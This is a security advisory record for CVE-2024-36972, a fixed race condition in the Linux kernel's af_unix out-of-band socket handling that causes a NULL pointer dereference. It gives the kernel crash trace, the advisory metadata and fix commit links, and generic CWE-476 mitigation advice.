[0]: BUG: kernel NULL pointer dereference, address: 0000000000000008 PF: supervisor write access in kernel mode PF: error_code(0x0002) - not-present page PGD 8000000009f5e067 P4D 8000000009f5e067 PUD 9f5d067 PMD 0 Oops: 0002 [#1] PREEMPT SMP PTI CPU: 3 PID: 50 Comm: kworker/3:1 Not tainted 6.9.0-rc5-00191-gd091e579b864 #110 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 Workqueue: events delayed_fput RIP: 0010:skb_dequeue (./include/linux/skbuff.h:2386 ./include/linux/skbuff.h:2402 net/core/skbuff.c:3847) Code: 39 e3 74 3e 8b 43 10 48 89 ef 83 e8 01 89 43 10 49 8b 44 24 08 49 c7 44 24 08 00 00 00 00 49 8b 14 24 49 c7 04 24 00 00 00 00 <48> 89 42 08 48 89 10 e8 e7 c5 42 00 4c 89 e0 5b 5d 41 5c c3 cc cc RSP: 0018:ffffc900001bfd48 EFLAGS: 00000002 RAX: 0000000000000000 RBX: ffff8880088f5ae8 RCX: 00000000361289f9 RDX: 0000000000000000 RSI: 0000000000000206 RDI: ffff8880088f5b00 RBP: ffff8880088f5b00 R08: 0000000000080000 R09: 0000000000000001 R10: 0000000000000003 R11: 0000000000000001 R12: ffff8880056b6a00 R13: ffff8880088f5280 R14: 0000000000000001 R15: ffff8880088f5a80 FS: 0000000000000000(0000) GS:ffff88807dd80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000008 CR3: 0000000006314000 CR4: 00000000007506f0 PKRU: 55555554 Call Trace: unix_release_sock (net/unix/af_unix.c:654) unix_release (net/unix/af_unix.c:1050) __sock_release (net/socket.c:660) sock_close (net/socket.c:1423) __fput (fs/file_table.c:423) delayed_fput (fs/file_table.c:444 (discriminator 3)) process_one_work (kernel/workqueue.c:3259) worker_thread (kernel/workqueue.c:3329 kernel/workqueue.c:3416) kthread (kernel/kthread.c:388) ret_from_fork (arch/x86/kernel/process.c:153) ret_from_fork_asm (arch/x86/entry/entry_64.S:257) Modules linked in: CR2: 0000000000000008
{
"affected": [],
"aliases": [
"CVE-2024-36972"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-10T15:15:52Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Update unix_sk(sk)-\u003eoob_skb under sk_receive_queue lock.\n\nBilly Jheng Bing-Jhong reported a race between __unix_gc() and\nqueue_oob().\n\n__unix_gc() tries to garbage-collect close()d inflight sockets,\nand then if the socket has MSG_OOB in unix_sk(sk)-\u003eoob_skb, GC\nwill drop the reference and set NULL to it locklessly.\n\nHowever, the peer socket still can send MSG_OOB message and\nqueue_oob() can update unix_sk(sk)-\u003eoob_skb concurrently, leading\nNULL pointer dereference. [0]\n\nTo fix the issue, let\u0027s update unix_sk(sk)-\u003eoob_skb under the\nsk_receive_queue\u0027s lock and take it everywhere we touch oob_skb.\n\nNote that we defer kfree_skb() in manage_oob() to silence lockdep\nfalse-positive (See [1]).\n\n[0]:\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n PF: supervisor write access in kernel mode\n PF: error_code(0x0002) - not-present page\nPGD 8000000009f5e067 P4D 8000000009f5e067 PUD 9f5d067 PMD 0\nOops: 0002 [#1] PREEMPT SMP PTI\nCPU: 3 PID: 50 Comm: kworker/3:1 Not tainted 6.9.0-rc5-00191-gd091e579b864 #110\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nWorkqueue: events delayed_fput\nRIP: 0010:skb_dequeue (./include/linux/skbuff.h:2386 ./include/linux/skbuff.h:2402 net/core/skbuff.c:3847)\nCode: 39 e3 74 3e 8b 43 10 48 89 ef 83 e8 01 89 43 10 49 8b 44 24 08 49 c7 44 24 08 00 00 00 00 49 8b 14 24 49 c7 04 24 00 00 00 00 \u003c48\u003e 89 42 08 48 89 10 e8 e7 c5 42 00 4c 89 e0 5b 5d 41 5c c3 cc cc\nRSP: 0018:ffffc900001bfd48 EFLAGS: 00000002\nRAX: 0000000000000000 RBX: ffff8880088f5ae8 RCX: 00000000361289f9\nRDX: 0000000000000000 RSI: 0000000000000206 RDI: ffff8880088f5b00\nRBP: ffff8880088f5b00 R08: 0000000000080000 R09: 0000000000000001\nR10: 0000000000000003 R11: 0000000000000001 R12: ffff8880056b6a00\nR13: ffff8880088f5280 R14: 0000000000000001 R15: ffff8880088f5a80\nFS: 0000000000000000(0000) GS:ffff88807dd80000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000008 CR3: 0000000006314000 CR4: 00000000007506f0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n unix_release_sock (net/unix/af_unix.c:654)\n unix_release (net/unix/af_unix.c:1050)\n __sock_release (net/socket.c:660)\n sock_close (net/socket.c:1423)\n __fput (fs/file_table.c:423)\n delayed_fput (fs/file_table.c:444 (discriminator 3))\n process_one_work (kernel/workqueue.c:3259)\n worker_thread (kernel/workqueue.c:3329 kernel/workqueue.c:3416)\n kthread (kernel/kthread.c:388)\n ret_from_fork (arch/x86/kernel/process.c:153)\n ret_from_fork_asm (arch/x86/entry/entry_64.S:257)\n \u003c/TASK\u003e\nModules linked in:\nCR2: 0000000000000008",
"id": "GHSA-rmff-fqq9-pc3q",
"modified": "2024-09-05T18:30:49Z",
"published": "2024-06-10T15:31:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36972"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/4708f49add84a57ce0ccc7bf9a6269845c631cc3"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/4bf6964451c3cb411fbaa1ae8b214b3d97a59bf1"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/518a994aa0b87d96f1bc6678a7035df5d1fcd7a1"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/9841991a446c87f90f66f4b9fee6fe934c1336a2"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d59ae9314b97e01c76a4171472441e55721ba636"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-56
For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].
Mitigation
Select a programming language that is not susceptible to these issues.
Mitigation
Check the results of all functions that return a value and verify that the value is non-null before acting upon it.
Mitigation
Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.
Mitigation
Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.
No CAPEC attack patterns related to this CWE.